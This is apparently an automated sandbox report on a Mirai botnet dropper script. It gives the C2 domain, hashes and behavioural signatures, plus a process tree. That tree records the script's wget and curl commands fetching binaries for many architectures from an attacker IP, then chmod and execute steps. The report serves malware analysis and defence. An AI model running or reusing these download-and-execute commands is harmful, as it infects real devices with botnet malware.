Analysis

  • max time kernel
    128s
  • max time network
    152s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    19-12-2024 07:12

General

  • Target

    feelme420.sh

  • Size

    3KB

  • MD5

    22e9d65b991f00de3a52071664dc52f9

  • SHA1

    2b6dd972572c4c72ecf43bb7b66eebe776cd0360

  • SHA256

    7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b

  • SHA512

    eefb50d98fc847673e4c38177789e26ee89ec7f027ec5ec92a842470638a84300f378cf10120afab26fe5a87de34c6616f33fc389be816b4763f0fea0eff18cb

Malware Config

Extracted

Family

mirai

C2

chernobyl.stressing.world

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (12800) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 16 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 16 IoCs
  • Modifies Watchdog functionality 1 TTPs 32 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Enumerates active TCP sockets 1 TTPs 15 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 32 IoCs
  • Reads process memory 1 TTPs 34 IoCs

    Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

  • Changes its process name 16 IoCs
  • Reads system network configuration 1 TTPs 15 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 31 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/feelme420.sh
    /tmp/feelme420.sh
    1⤵
    • Writes file to tmp directory
    PID:1468
    • /usr/bin/wget
      wget http://94.23.167.188/F331M3/feelme420.x86
      2⤵
      • Writes file to tmp directory
      PID:1469
    • /usr/bin/curl
      curl -O http://94.23.167.188/F331M3/feelme420.x86
      2⤵
      • Writes file to tmp directory
      PID:1478
    • /bin/cat
      cat feelme420.x86
      2⤵
        PID:1481
      • /bin/chmod
        chmod +x config-err-d1U8bY f331m3420 feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
        2⤵
        • File and Directory Permissions Modification
        PID:1482
      • /tmp/f331m3420
        ./f331m3420 feelme420.exploit
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Changes its process name
        PID:1483
      • /usr/bin/wget
        wget http://94.23.167.188/F331M3/feelme420.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1486
      • /usr/bin/curl
        curl -O http://94.23.167.188/F331M3/feelme420.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1490
      • /bin/chmod
        chmod +x config-err-d1U8bY f331m3420 feelme420.mips feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
        2⤵
        • File and Directory Permissions Modification
        PID:1492
      • /tmp/f331m3420
        ./f331m3420 feelme420.exploit
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Writes file to system bin folder
        • Changes its process name
        • Reads system network configuration
        PID:1493
      • /usr/bin/wget
        wget http://94.23.167.188/F331M3/feelme420.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1504
      • /usr/bin/curl
        curl -O http://94.23.167.188/F331M3/feelme420.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1508
      • /bin/chmod
        chmod +x config-err-d1U8bY f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
        2⤵
        • File and Directory Permissions Modification
        PID:1510
      • /tmp/f331m3420
        ./f331m3420 feelme420.exploit
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Writes file to system bin folder
        • Changes its process name
        • Reads system network configuration
        PID:1511
      • /usr/bin/wget
        wget http://94.23.167.188/F331M3/feelme420.arm
        2⤵
          PID:1514
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.arm
          2⤵
          • Writes file to tmp directory
          PID:1518
        • /bin/chmod
          chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
          2⤵
          • File and Directory Permissions Modification
          PID:1520
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1521
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.arm5
          2⤵
          • Writes file to tmp directory
          PID:1524
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.arm5
          2⤵
          • Writes file to tmp directory
          PID:1528
        • /bin/chmod
          chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
          2⤵
          • File and Directory Permissions Modification
          PID:1530
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1531
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.arm6
          2⤵
          • Writes file to tmp directory
          PID:1534
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.arm6
          2⤵
          • Writes file to tmp directory
          PID:1538
        • /bin/chmod
          chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
          2⤵
          • File and Directory Permissions Modification
          PID:1540
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1541
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.arm7
          2⤵
          • Writes file to tmp directory
          PID:1544
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.arm7
          2⤵
          • Writes file to tmp directory
          PID:1548
        • /bin/chmod
          chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
          2⤵
          • File and Directory Permissions Modification
          PID:1550
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1551
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.ppc
          2⤵
          • Writes file to tmp directory
          PID:1556
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.ppc
          2⤵
          • Writes file to tmp directory
          PID:1560
        • /bin/chmod
          chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
          2⤵
          • File and Directory Permissions Modification
          PID:1562
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1563
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.m68k
          2⤵
          • Writes file to tmp directory
          PID:1566
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.m68k
          2⤵
          • Writes file to tmp directory
          PID:1570
        • /bin/chmod
          chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
          2⤵
          • File and Directory Permissions Modification
          PID:1572
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1573
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.sh4
          2⤵
          • Writes file to tmp directory
          PID:1576
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.sh4
          2⤵
          • Writes file to tmp directory
          PID:1580
        • /bin/chmod
          chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
          2⤵
          • File and Directory Permissions Modification
          PID:1582
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1583
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.spc
          2⤵
          • Writes file to tmp directory
          PID:1586
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.spc
          2⤵
          • Writes file to tmp directory
          PID:1590
        • /bin/chmod
          chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
          2⤵
          • File and Directory Permissions Modification
          PID:1592
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1593
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.arc
          2⤵
          • Writes file to tmp directory
          PID:1596
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.arc
          2⤵
          • Writes file to tmp directory
          PID:1600
        • /bin/chmod
          chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
          2⤵
          • File and Directory Permissions Modification
          PID:1602
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1603
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.x86_64
          2⤵
          • Writes file to tmp directory
          PID:1606
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.x86_64
          2⤵
          • Writes file to tmp directory
          PID:1610
        • /bin/chmod
          chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
          2⤵
          • File and Directory Permissions Modification
          PID:1612
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1613
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.i686
          2⤵
          • Writes file to tmp directory
          PID:1616
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.i686
          2⤵
          • Writes file to tmp directory
          PID:1620
        • /bin/chmod
          chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
          2⤵
          • File and Directory Permissions Modification
          PID:1622
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1623
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.i486
          2⤵
          • Writes file to tmp directory
          PID:1626
        • /usr/bin/curl
          curl -O http://94.23.167.188/F331M3/feelme420.i486
          2⤵
          • Writes file to tmp directory
          PID:1630
        • /bin/chmod
          chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
          2⤵
          • File and Directory Permissions Modification
          PID:1632
        • /tmp/f331m3420
          ./f331m3420 feelme420.exploit
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Writes file to system bin folder
          • Changes its process name
          • Reads system network configuration
          PID:1633
        • /usr/bin/wget
          wget http://94.23.167.188/F331M3/feelme420.i586
          2⤵
            PID:1636
          • /usr/bin/curl
            curl -O http://94.23.167.188/F331M3/feelme420.i586
            2⤵
            • Writes file to tmp directory
            PID:1640
          • /bin/chmod
            chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i586 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
            2⤵
            • File and Directory Permissions Modification
            PID:1642
          • /tmp/f331m3420
            ./f331m3420 feelme420.exploit
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Writes file to system bin folder
            • Reads process memory
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:1643

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/f331m3420

          Filesize

          68KB

          MD5

          71b0c2e7cc122d6de4a481bea5ebc6d9

          SHA1

          f982ae244188ddd93b797e9548e049b97d2f2c7f

          SHA256

          de0eaed88adb239921c42f1f8038523d53c735f01992fe773f54e1d181750833

          SHA512

          f38ed5895d7c420b15688de521df6fc394ae9e1690a5f3628f22bd6489dab21ec8e9fa6dcfca40082d5099763d10b680bba3b43ef6f71016132958aa9a0d7f43